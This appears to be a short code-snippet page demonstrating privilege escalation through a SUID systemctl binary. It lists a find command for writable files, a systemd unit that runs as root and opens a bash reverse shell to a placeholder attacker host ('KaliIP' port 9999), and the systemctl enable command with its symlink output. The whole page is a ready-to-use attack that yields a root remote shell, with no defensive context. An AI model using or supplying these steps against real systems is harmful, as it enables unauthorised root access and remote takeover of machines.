privilege escalation systemctl code example

Example 1: suid privilege escalation systemctl

find -type f -maxdepth 2 -writable

Example 2: suid privilege escalation systemctl

[Unit]
Description=roooooooooot

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/KaliIP/9999 0>&1'

[Install]
WantedBy=multi-user.target

Example 3: suid privilege escalation systemctl

/bin/systemctl enable /var/tmp/root.service
Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /var/tmp/root.service
Created symlink from /etc/systemd/system/root.service to /var/tmp/root.service